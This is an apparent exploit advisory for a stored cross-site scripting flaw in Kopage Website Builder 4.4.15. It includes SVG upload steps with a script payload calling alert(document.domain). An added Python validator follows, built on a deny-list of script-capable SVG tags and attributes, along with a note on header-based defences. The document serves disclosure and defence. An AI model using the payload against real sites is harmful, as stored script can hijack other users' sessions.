Kopage Website Builder 4.4.15 Cross Site Scripting
Kopage Website Builder version 4.4.15 suffers from a persistent cross site scripting vulnerability.
# Exploit Title: Kopage Website Builder version 4.4.15 – Stored Cross-Site Scripting (XSS)
# Date: 1/12/2023
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.kopage.com/
# Version: 4.4.15
# Tested on: https://demo.kopage.com/index.php
# Poc:

1 ) Install the system through the website and log in with any user.
2 ) Go to the Files field and click upload.
3 ) Upload your SVG file.

Payload :

<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 500 500">
 <script>//<![CDATA[
 alert(document.domain)
 //]]>
 </script>
</svg>

4 ) Open the SVG file URL and you will see the alert.

Url : https://demo.kopage.com/demo/9ff16a191981a3f2ee0a7cca7/data/files/aaa.svg
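
The upload step above stores the SVG unchanged, so its script element runs when the file URL is opened. The following is an added example, not part of the original advisory and not Kopage code: a pre-storage check an upload handler could run to flag SVGs carrying active content. The names svg_findings, local and ACTIVE_TAGS are hypothetical, and the benign sample is constructed.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample: the SVG payload from the PoC above.
POC_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 500 500">
 <script>//<![CDATA[
 alert(document.domain)
 //]]>
 </script>
</svg>"""
# Constructed sample: a drawing with no active content.
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle cx="5" cy="5" r="4"/></svg>'

# Elements that can run script or embed foreign markup (deny-list, not exhaustive).
ACTIVE_TAGS = {"script", "foreignobject", "iframe", "object", "embed"}

def local(name: str) -> str:
    """Drop the '{namespace}' prefix ElementTree adds and lowercase the name."""
    return name.rsplit("}", 1)[-1].lower()

def svg_findings(data: bytes) -> list:
    """Return the reasons to reject an uploaded SVG; an empty list means none found."""
    # Refuse NUL bytes (UTF-16/32 input) and DTDs before parsing, so the byte
    # regex cannot be sidestepped and entity expansion never reaches the parser.
    if b"\x00" in data or re.search(rb"<!\s*(DOCTYPE|ENTITY)", data, re.I):
        return ["DOCTYPE/ENTITY declaration or non-UTF-8 encoding"]
    try:
        root = ET.fromstring(data)
    except (ET.ParseError, ValueError, LookupError) as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    for el in root.iter():
        tag = local(el.tag)
        if tag in ACTIVE_TAGS:
            findings.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            name = local(attr)
            if name.startswith("on"):
                findings.append(f"event handler attribute {name} on <{tag}>")
            elif name == "href" and re.sub(r"\s", "", value).lower().startswith("javascript:"):
                findings.append(f"javascript: URL in {name} on <{tag}>")
    return findings

if __name__ == "__main__":
    for label, sample in (("PoC", POC_SVG), ("benign", BENIGN_SVG)):
        print(label, svg_findings(sample) or "no active content found")
```

Script inside an SVG only runs when the browser opens the file as a document, so serving uploaded files with Content-Disposition: attachment or a Content-Security-Policy of script-src 'none' is the stronger control. A deny-list check like this one complements that header and does not replace it.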